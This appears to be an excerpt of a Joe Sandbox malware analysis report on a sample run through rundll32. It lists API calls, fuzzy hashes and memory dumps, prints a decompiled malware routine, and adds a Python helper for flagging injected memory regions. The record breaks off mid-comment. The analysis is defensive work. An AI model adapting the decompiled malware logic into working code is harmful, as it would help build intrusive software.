                                          • Opcode Fuzzy Hash: dfa11efa456a2f137c8709a26c15811f2ffcb44faf2517a5ec3839de5d4cddc8
                                          • Instruction Fuzzy Hash: 5311C231100209EFDB206F60DC45EAB7FE9EF053A1F104661F959A24A2DB39DCA5DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 00B69F55
                                            • Part of subcall function 00B5E628: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 00B5E63F
                                            • Part of subcall function 00B5E628: SetEvent.KERNEL32(?,?,?,?,00B5D3E9,?,?), ref: 00B5E64F
                                          • lstrlen.KERNEL32(?,?,?,?,?,00B6055F,?,?), ref: 00B69F78
                                          • lstrlen.KERNEL32(?,?,?,?,00B6055F,?,?), ref: 00B69F82
                                          • memcpy.NTDLL(?,?,00004000,?,?,00B6055F,?,?), ref: 00B69F93
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00B6055F,?,?), ref: 00B69FB5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                                          • String ID:
                                          • API String ID: 442095154-0
                                          • Opcode ID: e25c5bc85f22aadacd77a12600528c6331a7870832a532ffe488691ec1cb6e8d
                                          • Instruction ID: 7401bb588b3847cf845d1596944f649ea30e1b5a79dca538168275cf20f17d72
                                          • Opcode Fuzzy Hash: e25c5bc85f22aadacd77a12600528c6331a7870832a532ffe488691ec1cb6e8d
                                          • Instruction Fuzzy Hash: 08118B75A00204EFDB119F54EC84E5ABBF9EB85321F2184A4F90AE3260DB35ED409B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • lstrlenW.KERNEL32(00000000,76DDF560,00000000,?,00000000,?,?,00B55512,00000020), ref: 00B565E2
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B565F4
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56611
                                          • lstrlenW.KERNEL32(00000000,?,?,00B55512,00000020), ref: 00B5661D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B55512,00000020), ref: 00B56631
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                                          • String ID:
                                          • API String ID: 3403466626-0
                                          • Opcode ID: ca1605143eec9267e005ef7d410e593ebdd006e452f58772731612a8735eb41c
                                          • Instruction ID: 40ad90955e7f5a57bfeb548cad3d8682aec10092bce5b6660308c477792bc6d3
                                          • Opcode Fuzzy Hash: ca1605143eec9267e005ef7d410e593ebdd006e452f58772731612a8735eb41c
                                          • Instruction Fuzzy Hash: 41014C72101204BFD7119F98EC88FDE7BECEF49312F114095FA0997260CBB49D888B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32 ref: 00B69EE4
                                          • GetModuleHandleA.KERNEL32 ref: 00B69EF2
                                          • LoadLibraryExW.KERNEL32(?,?,?), ref: 00B69EFF
                                          • GetModuleHandleA.KERNEL32 ref: 00B69F16
                                          • GetModuleHandleA.KERNEL32 ref: 00B69F22
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModule$LibraryLoad
                                          • String ID:
                                          • API String ID: 1178273743-0
                                          • Opcode ID: 40052a23d929c8801fb153c098ca5abae430785a746cc916fbbf981b129114df
                                          • Instruction ID: 7723d9d3d332e39a2ddd2961c0d6f9ea54269d0f47a23ddc45a19267fb4e264a
                                          • Opcode Fuzzy Hash: 40052a23d929c8801fb153c098ca5abae430785a746cc916fbbf981b129114df
                                          • Instruction Fuzzy Hash: 4A01A93170020AAFDB015FA9EC44A6A3BEAFF183603010436F919C2170DF71DC619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,00B71EAE), ref: 00B5B800
                                          • StrTrimA.SHLWAPI(00000001,?,?,00B71EAE), ref: 00B5B823
                                          • StrTrimA.SHLWAPI(00000000,?,?,00B71EAE), ref: 00B5B832
                                          • _strupr.NTDLL ref: 00B5B835
                                          • lstrlen.KERNEL32(00000000,00B71EAE), ref: 00B5B83D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Trim$_struprlstrlen
                                          • String ID:
                                          • API String ID: 2280331511-0
                                          • Opcode ID: 7e24fefcf9883fa95b79ffd8d2ce3ed8ebff7603c3e27f10d4c1f7216451c63d
                                          • Instruction ID: 5cb8ec1741545536aa7eabedf018bd690acddaa10d8d889a50de1345d7074496
                                          • Opcode Fuzzy Hash: 7e24fefcf9883fa95b79ffd8d2ce3ed8ebff7603c3e27f10d4c1f7216451c63d
                                          • Instruction Fuzzy Hash: 6CF06D31241016AFE6199B24EC8DE7B37EDEB49711B050098F509DB251EF249C4187A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B5E731
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B5E742
                                          • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,00B574E7,?,?,00B79448,00B5340D,00000003), ref: 00B5E759
                                          • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,00B574E7,?,?,00B79448,00B5340D,00000003), ref: 00B5E773
                                          • GetLastError.KERNEL32(?,?,00B574E7,?,?,00B79448,00B5340D,00000003), ref: 00B5E780
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 653387826-0
                                          • Opcode ID: 9c912ba463bc578db30f21a14ff5d29140a90c81a5824150c7dcbbad81fef27b
                                          • Instruction ID: 9cf23a37b65f2ab5776e5421ed77ef7b306cd294e0403f8aac61845a56493332
                                          • Opcode Fuzzy Hash: 9c912ba463bc578db30f21a14ff5d29140a90c81a5824150c7dcbbad81fef27b
                                          • Instruction Fuzzy Hash: B901A276100304EFD7219F54CC04E6ABBF9FF88321B1185A9EA5A93760DB30EE05CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B65D07,?), ref: 00B619A7
                                          • GetVersion.KERNEL32 ref: 00B619B6
                                          • GetCurrentProcessId.KERNEL32 ref: 00B619D2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00B619EF
                                          • GetLastError.KERNEL32 ref: 00B61A0E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 7ea8cfe6a20760856b4d3ed9b1a884c326900d2950d19d126bb9d49f56e82bab
                                          • Instruction ID: c70bf39ab10f47dc533ad83917c76d87d146a8ce9efc6edaa7f6f95f7b7e9eff
                                          • Opcode Fuzzy Hash: 7ea8cfe6a20760856b4d3ed9b1a884c326900d2950d19d126bb9d49f56e82bab
                                          • Instruction Fuzzy Hash: A8F0AF30681302EBD7209BB8AC1DB543BF5E704B47F540969E66AE75E0DF7484D1CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00B5F9DD
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 00B5F9ED
                                          • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 00B5F9F6
                                          • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,00B57779,?,?,00000040), ref: 00B5FA14
                                          • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,00B57779,?,?,00000040), ref: 00B5FA21
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 3667519916-0
                                          • Opcode ID: 54832d3b71b3be51f8d7207bb3a9c7315872af47ee5490a320b1eeffa0b2b1a0
                                          • Instruction ID: 5cc445cd7f34f4af23e5583d66026067788082a3bf0215f9b9f455861dc5cdb7
                                          • Opcode Fuzzy Hash: 54832d3b71b3be51f8d7207bb3a9c7315872af47ee5490a320b1eeffa0b2b1a0
                                          • Instruction Fuzzy Hash: F9F03031200B05AFD7216B65EC44F1AB6E8FF44357F1146A5F945D35A0CB24ED89CA25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 00B6F87B
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • wsprintfA.USER32 ref: 00B6F8AC
                                            • Part of subcall function 00B5B175: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,00B62B68), ref: 00B5B18B
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B1B3
                                            • Part of subcall function 00B5B175: lstrlen.KERNEL32(?), ref: 00B5B1C2
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B202
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B237
                                            • Part of subcall function 00B5B175: memcpy.NTDLL(00000000,?,?), ref: 00B5B244
                                            • Part of subcall function 00B5B175: memcpy.NTDLL(00000008,00B743E8,00000002,00000000,?,?), ref: 00B5B259
                                            • Part of subcall function 00B5B175: wsprintfA.USER32 ref: 00B5B27C
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6F921
                                            • Part of subcall function 00B7240D: RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B72423
                                            • Part of subcall function 00B7240D: RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B7243E
                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 00B6F90B
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B6F917
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                          • String ID:
                                          • API String ID: 3553201432-0
                                          • Opcode ID: d03cf90b13bf901d0d5e115a50df0299912d3aa1efcad9545703c79da6ea261c
                                          • Instruction ID: 29223274f7f50ca06d4221a2b728e9dac656d41165aa8337edbb1f233671170d
                                          • Opcode Fuzzy Hash: d03cf90b13bf901d0d5e115a50df0299912d3aa1efcad9545703c79da6ea261c
                                          • Instruction Fuzzy Hash: 03212B76800109BFCF01DFA5EC88CDF7BB9FB48310B004466F919A7120D7719A64DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F3CF
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F3E0
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F3F8
                                          • CloseHandle.KERNEL32(?), ref: 00B6F412
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6F427
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap$CloseHandle
                                          • String ID:
                                          • API String ID: 1910495013-0
                                          • Opcode ID: acca0055bc957be95c6f015000ad5a111942619d5167bb2193a59c43d0c90b10
                                          • Instruction ID: 5b636a06cce4026ff5a3dba8f2a7fdbd420cd9b6a60a5ae8e45c669fd965a632
                                          • Opcode Fuzzy Hash: acca0055bc957be95c6f015000ad5a111942619d5167bb2193a59c43d0c90b10
                                          • Instruction Fuzzy Hash: 55214A71601522AFD711DB65EC88C6AFBAAFF49B1131444A4F409D3A20CB35ECA1CBE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B56778: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 00B56793
                                            • Part of subcall function 00B56778: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 00B567E1
                                            • Part of subcall function 00B56778: GetProcAddress.KERNEL32(00000000,?), ref: 00B567FA
                                            • Part of subcall function 00B56778: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00B5684B
                                          • GetLastError.KERNEL32(?,?,?), ref: 00B53248
                                          • FreeLibrary.KERNEL32(?,?,?), ref: 00B532B0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                          • String ID:
                                          • API String ID: 1730969706-0
                                          • Opcode ID: a9daadcf9e00f06059c7769eebe730496e861b12e65ba5c38f993ab17c676a21
                                          • Instruction ID: 9f3de7b7d2637e5adb16407ee8be98047ad192b1e31ef18cf7f402b3e230c1cf
                                          • Opcode Fuzzy Hash: a9daadcf9e00f06059c7769eebe730496e861b12e65ba5c38f993ab17c676a21
                                          • Instruction Fuzzy Hash: B371E475D00609AFCF01DFE4C884AADBBF9FF48746B1085A9E915A7211D732AE45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E04895D8F(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x489a348; // 0x9ad5a8
                                          					_t5 = _t103 + 0x489b038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x4899290);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x489a348; // 0x9ad5a8
                                          												_t28 = _t109 + 0x489b0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x489a348; // 0x9ad5a8
                                          														_t33 = _t79 + 0x489b078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}





































                                          (Per-line instruction addresses for the listing above, originally a separate column: 0x04895d94 to 0x04895f20, inside function 04895D8F. The entries are not monotonic because the decompiler reorders basic blocks; 0x00000000 stands for lines that have no address.)

                                          APIs
                                          • SysAllocString.OLEAUT32(04899290), ref: 04895DDF
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04895EC0
                                          • SysFreeString.OLEAUT32(00000000), ref: 04895ED9
                                          • SysFreeString.OLEAUT32(?), ref: 04895F08
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: f1209463bbff5d4295f3f0b8156167e77b93c511257818910df37f0dab9c51c5
                                          • Instruction ID: 912d577ff9b15bc3ce1ce05e01dba076b46e755fbba4f504c4fcce0ab9350ee8
                                          • Opcode Fuzzy Hash: f1209463bbff5d4295f3f0b8156167e77b93c511257818910df37f0dab9c51c5
                                          • Instruction Fuzzy Hash: 4E512276D0091AEFCF01DFA8C48899EB7B5FF88705B184A94E915EB310D772AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 048933CF
                                          • SysFreeString.OLEAUT32(00000000), ref: 048934B4
                                            • Part of subcall function 04895D8F: SysAllocString.OLEAUT32(04899290), ref: 04895DDF
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04893507
                                          • SysFreeString.OLEAUT32(00000000), ref: 04893516
                                            • Part of subcall function 04893FDD: Sleep.KERNEL32(000001F4), ref: 04894025
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          • Opcode ID: 01413e1c766cb8ec1dd6abed8839039a7e21c1a674d5337578d3c74f3de71e4c
                                          • Instruction ID: 2bc1d6004f018c46e25fccc69190e67e550389eb9517610977fd0a7dbc71649d
                                          • Opcode Fuzzy Hash: 01413e1c766cb8ec1dd6abed8839039a7e21c1a674d5337578d3c74f3de71e4c
                                          • Instruction Fuzzy Hash: 6D514C75500A09AFDB02DFA8C844A9EB7F6FF8C700B198928E915DB220DB75ED45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?), ref: 00B72891
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • ResetEvent.KERNEL32(?,?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9), ref: 00B72908
                                          • GetLastError.KERNEL32(?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?), ref: 00B72935
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • GetLastError.KERNEL32(?,?,?,00B6C0C1,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?), ref: 00B729F7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 9c08fa3d3e2a23484ce3cc5e86b2090a34c1cdf7602783997186f1c67509f1de
                                          • Instruction ID: a74363b6a44b3b36fde638b57244e549d250b8a8eff6e2b0e8a2537bdda7d9be
                                          • Opcode Fuzzy Hash: 9c08fa3d3e2a23484ce3cc5e86b2090a34c1cdf7602783997186f1c67509f1de
                                          • Instruction Fuzzy Hash: 23417172500205BFDB209FA4CC89EBB7AEDEF04705F044979F65AD61A0DB71DD849B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%
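The two Memory Dump Source lines in this section describe different kinds of region inside the rundll32 process: 0000000004891000 carries the field 00000020 and "based on PE: true", while 0000000000B50000 carries 00000040, "based on PE: false" and Yara matches. The script below is an added triage helper, not part of this report or of Joe Sandbox. It assumes that the fifth dot-separated field of a dump name is the Win32 page protection (0x20 = PAGE_EXECUTE_READ and 0x40 = PAGE_EXECUTE_READWRITE, which agrees with the two names here) and leaves the remaining fields undecoded; the list of report lines it runs over is copied from this section.

```python
"""Triage of Joe Sandbox memory-dump names (added example, not report output).

Assumed name layout, inferred only from the names on this page:
  <proc>.<stage>.<dump-id>.<base, 16 hex>.<protect, 8 hex>.<f6>.<f7>.<f8>.sdmp
Only <protect> is decoded (winnt.h PAGE_* values); f6..f8 are kept raw because
the report does not say what they mean.
"""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

NAME_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f6>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)
# Matches the report's "Source File: <name>, Offset: <hex>, based on PE: <bool>" lines.
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+?\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass
class Dump:
    name: str
    base: int
    offset: int
    protect: int
    pe_backed: bool

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # PAGE_EXECUTE* are 0x10..0x80

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE, WRITECOPY and their EXECUTE forms


def parse_source_line(line: str):
    """Dump for one 'Source File:' line, or None if the line does not have that shape."""
    m = SOURCE_RE.search(line)
    if not m:
        return None
    f = NAME_RE.match(m["name"])
    if not f:
        return None
    return Dump(m["name"], int(f["base"], 16), int(m["offset"], 16),
                int(f["protect"], 16), m["pe"] == "true")


def flag_injected(dumps):
    """Executable and writable regions with no PE behind them: the usual injected-code profile."""
    return [d for d in dumps if d.executable and d.writable and not d.pe_backed]


# The two Source File lines from this section, copied verbatim (constructed list).
REPORT_LINES = [
    "• Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true",
    "• Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false",
]


def triage(lines=REPORT_LINES):
    """Returns (all parsed dumps, the subset that looks like injected code)."""
    dumps = [d for d in map(parse_source_line, lines) if d is not None]
    return dumps, flag_injected(dumps)


if __name__ == "__main__":
    for d in triage()[0]:
        print(f"{d.base:#010x} {d.protect_name:<24} pe_backed={d.pe_backed}")
```

Run against the two lines above, only the 0xB50000 region is flagged: it is RWX, has no PE image behind it, and is the region whose functions carry the Yara matches on this page, so it is where a memory-forensics pass (or a Volatility-style RWX sweep of rundll32) should start.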

                                          C-Code - Quality: 85%
                                          			// Analyst note (added, not decompiler output): the shape of this routine, a normalising bit
                                          			// shift, a 64-bit quotient estimate through _allmul/_aulldiv, a multiply-subtract followed by a
                                          			// subtract-and-compare correction loop, result digits written to the fixed buffer 0x489a1d0, the
                                          			// remainder shifted back into _a4 and both stack work buffers wiped with memset, is that of
                                          			// schoolbook multi-precision division (dividend buffer 0x10c bytes, divisor buffer 0x84 bytes).
                                          			// The entry at 00B67126 in the 0xB50000 region lists the same API sequence and API String ID,
